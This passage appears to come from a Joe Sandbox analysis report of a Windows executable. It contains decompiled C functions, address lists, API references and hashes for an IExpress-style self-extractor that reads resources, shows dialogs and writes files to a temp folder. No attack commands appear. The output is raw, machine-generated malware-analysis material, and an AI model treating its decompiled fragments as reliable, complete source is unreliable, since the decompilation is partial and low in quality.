                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x008d28f1
                                                                                                                                                                                                                                            0x008d28f4
                                                                                                                                                                                                                                            0x008d28f7
                                                                                                                                                                                                                                            0x008d28f9
                                                                                                                                                                                                                                            0x008d28fc
                                                                                                                                                                                                                                            0x008d28ff
                                                                                                                                                                                                                                            0x008d2901
                                                                                                                                                                                                                                            0x008d2907
                                                                                                                                                                                                                                            0x008d2a62
                                                                                                                                                                                                                                            0x008d2a64
                                                                                                                                                                                                                                            0x008d290d
                                                                                                                                                                                                                                            0x008d290d
                                                                                                                                                                                                                                            0x008d290f
                                                                                                                                                                                                                                            0x008d2912
                                                                                                                                                                                                                                            0x008d2920
                                                                                                                                                                                                                                            0x008d2937
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2944
                                                                                                                                                                                                                                            0x008d294a
                                                                                                                                                                                                                                            0x008d294f
                                                                                                                                                                                                                                            0x008d2a2f
                                                                                                                                                                                                                                            0x008d2a32
                                                                                                                                                                                                                                            0x008d2a34
                                                                                                                                                                                                                                            0x008d2a37
                                                                                                                                                                                                                                            0x008d2a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2955
                                                                                                                                                                                                                                            0x008d295e
                                                                                                                                                                                                                                            0x008d2962
                                                                                                                                                                                                                                            0x008d2969
                                                                                                                                                                                                                                            0x008d296f
                                                                                                                                                                                                                                            0x008d2974
                                                                                                                                                                                                                                            0x008d298c
                                                                                                                                                                                                                                            0x008d2a20
                                                                                                                                                                                                                                            0x008d2a21
                                                                                                                                                                                                                                            0x008d2a27
                                                                                                                                                                                                                                            0x008d2a4c
                                                                                                                                                                                                                                            0x008d2a4f
                                                                                                                                                                                                                                            0x008d2a50
                                                                                                                                                                                                                                            0x008d2a53
                                                                                                                                                                                                                                            0x008d2a56
                                                                                                                                                                                                                                            0x008d2a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d29b2
                                                                                                                                                                                                                                            0x008d29b2
                                                                                                                                                                                                                                            0x008d29b5
                                                                                                                                                                                                                                            0x008d29bd
                                                                                                                                                                                                                                            0x008d29c3
                                                                                                                                                                                                                                            0x008d29cc
                                                                                                                                                                                                                                            0x008d29d5
                                                                                                                                                                                                                                            0x008d29d7
                                                                                                                                                                                                                                            0x008d29da
                                                                                                                                                                                                                                            0x008d29dd
                                                                                                                                                                                                                                            0x008d29df
                                                                                                                                                                                                                                            0x008d29ec
                                                                                                                                                                                                                                            0x008d29f8
                                                                                                                                                                                                                                            0x008d29fc
                                                                                                                                                                                                                                            0x008d29ff
                                                                                                                                                                                                                                            0x008d2a02
                                                                                                                                                                                                                                            0x008d2a07
                                                                                                                                                                                                                                            0x008d2a0a
                                                                                                                                                                                                                                            0x008d2a0f
                                                                                                                                                                                                                                            0x008d2a19
                                                                                                                                                                                                                                            0x008d2a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2a0f
                                                                                                                                                                                                                                            0x008d298c
                                                                                                                                                                                                                                            0x008d2974
                                                                                                                                                                                                                                            0x008d2962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d294f
                                                                                                                                                                                                                                            0x008d2912
                                                                                                                                                                                                                                            0x008d2a65
                                                                                                                                                                                                                                            0x008d2a68
                                                                                                                                                                                                                                            0x008d2a6c
                                                                                                                                                                                                                                            0x008d2a6f
                                                                                                                                                                                                                                            0x008d2a6f
                                                                                                                                                                                                                                            0x008d2a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 008D2A6F
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: CharUpperA.USER32(12CB0CEF,00000000,00000000,00000000), ref: 008D27A8
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: CharNextA.USER32(0000054D), ref: 008D27B5
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: CharNextA.USER32(00000000), ref: 008D27BC
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2829
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2852
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2870
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D28A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,008D3938,?,?,?,?,-00000005), ref: 008D2958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 008D2969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,008D3938,?,?,?,?,-00000005,?), ref: 008D2A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 008D2A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: 149bb1526d314c7980ba033df8743e998de5c75b18d71aa274f4836a026299c7
                                                                                                                                                                                                                                            • Instruction ID: 842406f904d316d294df892fc7892b6a3b977724e4c2ad0e729a1f3bd14bef38
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 149bb1526d314c7980ba033df8743e998de5c75b18d71aa274f4836a026299c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F511931900229EBCB25DF98D884AAEFBB5FF58711F14422BE915E3311D7319D41DB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E008D4169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E008D468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E008D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E008D44B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x008d417d
                                                                                                                                                                                                                                            0x008d418f
                                                                                                                                                                                                                                            0x008d4193
                                                                                                                                                                                                                                            0x008d41b7
                                                                                                                                                                                                                                            0x008d41d3
                                                                                                                                                                                                                                            0x008d41e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d41e7
                                                                                                                                                                                                                                            0x008d41d5
                                                                                                                                                                                                                                            0x008d41d6
                                                                                                                                                                                                                                            0x008d41d8
                                                                                                                                                                                                                                            0x008d41d9
                                                                                                                                                                                                                                            0x008d41da
                                                                                                                                                                                                                                            0x008d41df
                                                                                                                                                                                                                                            0x008d41e1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d41e1
                                                                                                                                                                                                                                            0x008d41b9
                                                                                                                                                                                                                                            0x008d41ba
                                                                                                                                                                                                                                            0x008d41bc
                                                                                                                                                                                                                                            0x008d41bd
                                                                                                                                                                                                                                            0x008d41be
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d41be
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,008D30B4), ref: 008D4189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,008D30B4), ref: 008D41E7
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: b99ec6ca344992c3199954c91f01b46f7600c502960a1bf6b9736c1cb9d509ef
                                                                                                                                                                                                                                            • Instruction ID: 122b34f92f6ebe2e139749a32206fd34e3377f2e5b789240c421523afa9035fa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b99ec6ca344992c3199954c91f01b46f7600c502960a1bf6b9736c1cb9d509ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5801A2A13012147BFB2826A95C86F7B638EFB94795F104327B706D1380DA79CC41417A
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E008D43D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x8d9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x008d19e0
                                                                                                                                                                                                                                            0x008d19e0
                                                                                                                                                                                                                                            0x008d19eb
                                                                                                                                                                                                                                            0x008d19f2
                                                                                                                                                                                                                                            0x008d19f9
                                                                                                                                                                                                                                            0x008d19fc
                                                                                                                                                                                                                                            0x008d1a01
                                                                                                                                                                                                                                            0x008d1a2a
                                                                                                                                                                                                                                            0x008d1a2e
                                                                                                                                                                                                                                            0x008d1a3e
                                                                                                                                                                                                                                            0x008d1a4f
                                                                                                                                                                                                                                            0x008d1a62
                                                                                                                                                                                                                                            0x008d1a6a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1a03
                                                                                                                                                                                                                                            0x008d1a06
                                                                                                                                                                                                                                            0x008d1a20
                                                                                                                                                                                                                                            0x008d1a20
                                                                                                                                                                                                                                            0x008d1a08
                                                                                                                                                                                                                                            0x008d1a08
                                                                                                                                                                                                                                            0x008d1a14
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1a16
                                                                                                                                                                                                                                            0x008d1a18
                                                                                                                                                                                                                                            0x008d1a70
                                                                                                                                                                                                                                            0x008d1a72
                                                                                                                                                                                                                                            0x008d1a72
                                                                                                                                                                                                                                            0x008d1a14
                                                                                                                                                                                                                                            0x008d1a06
                                                                                                                                                                                                                                            0x008d1a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 008D1A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D1A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 008D1A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 008D1A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 008D1A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 6da6ce268a2a60c17578ee3b79e050b0474e1694262702a46ba957ea889bafd0
                                                                                                                                                                                                                                            • Instruction ID: 1a8040c278b5c305d2514bde7e476c80a94128996ea37a252a6f983c2f15d74f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6da6ce268a2a60c17578ee3b79e050b0474e1694262702a46ba957ea889bafd0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E115E31502129ABDF14EF68DD08EAE77B8FF49310F208356E916D6291DA309E11DB96
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E008D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E008D1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				E008D658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0x8d9124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x008d63cb
                                                                                                                                                                                                                                            0x008d63d2
                                                                                                                                                                                                                                            0x008d63d8
                                                                                                                                                                                                                                            0x008d63ea
                                                                                                                                                                                                                                            0x008d63f3
                                                                                                                                                                                                                                            0x008d6401
                                                                                                                                                                                                                                            0x008d6402
                                                                                                                                                                                                                                            0x008d6410
                                                                                                                                                                                                                                            0x008d6415
                                                                                                                                                                                                                                            0x008d6433
                                                                                                                                                                                                                                            0x008d6438
                                                                                                                                                                                                                                            0x008d6449
                                                                                                                                                                                                                                            0x008d6463
                                                                                                                                                                                                                                            0x008d646d
                                                                                                                                                                                                                                            0x008d6477
                                                                                                                                                                                                                                            0x008d6477
                                                                                                                                                                                                                                            0x008d647a
                                                                                                                                                                                                                                            0x008d643a
                                                                                                                                                                                                                                            0x008d643a
                                                                                                                                                                                                                                            0x008d6444
                                                                                                                                                                                                                                            0x008d6444
                                                                                                                                                                                                                                            0x008d6492

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D63EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-305352358
                                                                                                                                                                                                                                            • Opcode ID: 10f76ad957962077e26030349c2ab575efb07bd770b3a7357bb9d12f653e2ebe
                                                                                                                                                                                                                                            • Instruction ID: 09b27c25595f87f1d51906dab4a73740bf7736d26bed19cd827097574b434581
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10f76ad957962077e26030349c2ab575efb07bd770b3a7357bb9d12f653e2ebe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B221C371A0121CABDB10DF25DC85FEA7368FB45324F10436AE595E3280EAB45D948FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E008D1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0x8d91e0; // 0x33c7140
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0x8d91e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            					E008D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            				E008D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x008d47e8
                                                                                                                                                                                                                                            0x008d47f0
                                                                                                                                                                                                                                            0x008d47f4
                                                                                                                                                                                                                                            0x008d480f
                                                                                                                                                                                                                                            0x008d4811
                                                                                                                                                                                                                                            0x008d4814
                                                                                                                                                                                                                                            0x008d4814
                                                                                                                                                                                                                                            0x008d4816
                                                                                                                                                                                                                                            0x008d4817
                                                                                                                                                                                                                                            0x008d4829
                                                                                                                                                                                                                                            0x008d482b
                                                                                                                                                                                                                                            0x008d482f
                                                                                                                                                                                                                                            0x008d484f
                                                                                                                                                                                                                                            0x008d4852
                                                                                                                                                                                                                                            0x008d4855
                                                                                                                                                                                                                                            0x008d4855
                                                                                                                                                                                                                                            0x008d4857
                                                                                                                                                                                                                                            0x008d4858
                                                                                                                                                                                                                                            0x008d4860
